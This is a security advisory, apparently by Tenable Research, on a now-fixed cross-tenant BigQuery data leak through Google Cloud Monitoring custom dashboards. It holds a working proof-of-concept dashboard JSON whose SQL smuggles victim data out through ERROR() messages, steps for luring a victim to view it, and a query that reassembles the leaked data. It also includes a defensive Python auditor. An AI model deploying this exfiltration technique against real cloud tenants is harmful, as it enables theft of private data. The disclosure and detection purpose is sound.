
Google Cloud Platform (GCP) Cloud Monitoring Cross-Tenant BigQuery Leak with Custom Dashboard

High

Synopsis

Tenable Research has identified and responsibly disclosed a data exfiltration vulnerability in Google Cloud Monitoring. This flaw allowed an attacker to leak sensitive data from a victim's BigQuery datasets by abusing the Observability Analytics widget in custom dashboards.

Cloud Monitoring dashboard widgets run automatically when a dashboard is opened, and they run with the viewer's permissions. An attacker could create a dashboard containing Observability Analytics widgets configured with malicious SQL queries. These queries were designed to raise errors whose messages carried data read from datasets in other Google Cloud tenants (the victim's project) for which the attacker had no permissions. The attacker could then grant the victim permissions to the dashboard. When the victim browses to the dashboard, the queries run and the victim's private BigQuery data is exfiltrated to the attacker's project logs.


Proof of Concept:

  1. Make sure Log Analytics is active and that at least one log view is available
  2. Give the victim’s principal IAM permissions in the attacker’s tenant
  3. Create a custom Cloud Monitoring dashboard
  4. Add an Observability Analytics widget with any valid query, choosing the BigQuery engine in the settings
  5. Use the JSON editor to insert a malicious JSON


{
  "displayName": "ExfilTest",
  "dashboardFilters": [],
  "mosaicLayout": {
    "columns": 48,
    "tiles": [
      {
        "height": 1,
        "width": 1,
        "widget": {
          "title": "offset0",
          "id": "",
          "timeSeriesTable": {
            "columnSettings": [],
            "dataSets": [
              {
                "tableTemplate": "",
                "timeSeriesQuery": {
                  "opsAnalyticsQuery": {
                    "queryExecutionRules": {
                      "useReservedSlots": true
                    },
                    "queryHandle": "[QUERY_HANDLE]",
                    "savedQueryId": "",
                    "sql": "SELECT\n  ERROR(CONCAT('offset0: ', TO_BASE64(\n    CAST(\n      TO_JSON_STRING(ARRAY_AGG(t)) AS BYTES\n    ))\n  ))\nFROM (\n  SELECT t\n  FROM\n    `[ATTACKER_LOGVIEW]` AS l\n    CROSS JOIN `[VICTIM_DATASET]` AS t\n  LIMIT 1 OFFSET 0\n);\n"
                  },
                  "outputFullDuration": false,
                  "unitOverride": ""
                }
              }
            ],
            "displayColumnType": false,
            "metricVisualization": "NUMBER"
          }
        }
      },
      {
        "xPos": 2,
        "height": 1,
        "width": 1,
        "widget": {
          "title": "offset1",
          "id": "",
          "timeSeriesTable": {
            "columnSettings": [],
            "dataSets": [
              {
                "tableTemplate": "",
                "timeSeriesQuery": {
                  "opsAnalyticsQuery": {
                    "queryExecutionRules": {
                      "useReservedSlots": true
                    },
                    "queryHandle": "[QUERY_HANDLE]",
                    "savedQueryId": "",
                    "sql": "SELECT\n  ERROR(CONCAT('offset1: ', TO_BASE64(\n    CAST(\n      TO_JSON_STRING(ARRAY_AGG(t)) AS BYTES\n    ))\n  ))\nFROM (\n  SELECT t\n  FROM\n    `[ATTACKER_LOGVIEW]` AS l\n    CROSS JOIN `[VICTIM_DATASET]` AS t\n  LIMIT 1 OFFSET 1\n);\n"
                  },
                  "outputFullDuration": false,
                  "unitOverride": ""
                }
              }
            ],
            "displayColumnType": false,
            "metricVisualization": "NUMBER"
          }
        }
      }
    ]
  }
}


  6. Apply the changes; you should see widgets that fail to run due to a lack of permissions
  7. Share the dashboard with the victim and wait for them to click on the email, or get them to browse to the URL some other way, such as CSRF
  8. Once the victim views the dashboard, query the logs to reconstruct the data


SELECT
  CAST(
    FROM_BASE64(
      REGEXP_EXTRACT(
        -- grab the base64 run after the word `offset`
        proto_payload.audit_log.status.message,
        r'^offset\d+:\s+([A-Za-z0-9+/=]+)'
      )
    ) AS STRING
  )
FROM `[ATTACKER_LOGVIEW]`
WHERE severity = "ERROR"
  AND STARTS_WITH(proto_payload.audit_log.status.message, 'offset')
ORDER BY timestamp DESC


Solution

Google has resolved the issue by stopping the automatic execution of Log Analytics queries. A custom dashboard query that involves resources which do not share an ownership boundary with the dashboard now displays a warning asking the user to check that the query is safe; only after the user confirms is the query run manually in the charts.
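The ownership-boundary check that the fix describes can also be applied offline when reviewing dashboard JSON exported from your own project. The following is an added example written for this advisory, not Tenable's or Google's code: it walks the mosaicLayout.tiles structure used in the PoC, flags any opsAnalyticsQuery SQL that references a table or log view in a project other than the dashboard's or that calls ERROR(), and runs against a constructed sample whose project ids are placeholders.

```python
import json
import re

# Backtick-quoted BigQuery table or Log Analytics view references, e.g.
# `proj.dataset.table` or `proj.global._Default._AllLogs`; in both forms
# the first dotted (or colon-separated) component is the project id.
_TABLE_REF = re.compile(r"`([A-Za-z0-9_.:-]+)`")
_ERROR_CALL = re.compile(r"\bERROR\s*\(", re.IGNORECASE)


def _find_key(node, key):
    """Yield every value stored under `key` anywhere in a nested JSON tree."""
    if isinstance(node, dict):
        if key in node:
            yield node[key]
        for value in node.values():
            yield from _find_key(value, key)
    elif isinstance(node, list):
        for item in node:
            yield from _find_key(item, key)


def _project_of(ref):
    return re.split(r"[.:]", ref, maxsplit=1)[0]


def audit_dashboard(dashboard, dashboard_project):
    """Return one finding per Observability Analytics widget whose SQL reads
    outside the dashboard's project or raises a caller-controlled ERROR()."""
    findings = []
    for widget in _find_key(dashboard, "widget"):
        for query in _find_key(widget, "opsAnalyticsQuery"):
            sql = query.get("sql", "")
            foreign = sorted({r for r in _TABLE_REF.findall(sql)
                              if _project_of(r) != dashboard_project})
            raises = bool(_ERROR_CALL.search(sql))
            if foreign or raises:
                findings.append({"widget": widget.get("title", ""),
                                 "foreign_refs": foreign,
                                 "raises_error": raises})
    return findings


# Constructed sample: one benign widget and one modelled on the advisory's PoC.
# "defender-proj" and "other-tenant" are placeholder project ids.
SAMPLE_DASHBOARD = json.loads("""{"displayName": "review-sample", "mosaicLayout": {"columns": 48, "tiles": [
 {"widget": {"title": "errors", "timeSeriesTable": {"dataSets": [{"timeSeriesQuery": {"opsAnalyticsQuery":
  {"sql": "SELECT COUNT(*) FROM `defender-proj.global._Default._AllLogs` WHERE severity = 'ERROR'"}}}]}}},
 {"widget": {"title": "offset0", "timeSeriesTable": {"dataSets": [{"timeSeriesQuery": {"opsAnalyticsQuery":
  {"sql": "SELECT ERROR(CONCAT('offset0: ', TO_BASE64(CAST(TO_JSON_STRING(ARRAY_AGG(t)) AS BYTES)))) FROM (SELECT t FROM `defender-proj.global._Default._AllLogs` AS l CROSS JOIN `other-tenant.sales.customers` AS t LIMIT 1 OFFSET 0)"}}}]}}}
]}}""")

if __name__ == "__main__":
    for finding in audit_dashboard(SAMPLE_DASHBOARD, "defender-proj"):
        print(finding)
```

Running it against an export from the Dashboards API lists only the widgets that would trip Google's new warning, which makes a periodic review of shared dashboards cheap.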

Disclosure Timeline

October 30, 2025 - Tenable reports the finding to Google
November 5, 2025 - Google requests clarification about the reproduction steps
November 6, 2025 - Tenable clarifies reproduction steps, and sends improvements to the PoC
November 11, 2025 - Google requests additional clarification about the reproduction steps
November 12, 2025 - Tenable clarifies
November 17, 2025 - Google requests additional clarification about the reproduction steps
November 18, 2025 - Tenable clarifies
November 25, 2025 - Google accepts the bug and assigns an S1 severity
December 4, 2025 - Google awards a bounty
December 7, 2025 - Tenable confirms and requests details of the fix once they are available
January 4, 2026 - Tenable requests an update
January 7, 2026 - Google updates that product teams are still working on a mitigation
January 15, 2026 - Tenable gives a heads-up that the disclosure date is approaching
January 22, 2026 - Google updates that the fix is rolling out, Tenable acknowledges and requests additional details regarding the fix
January 27, 2026 - Google provides details regarding the fix

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]
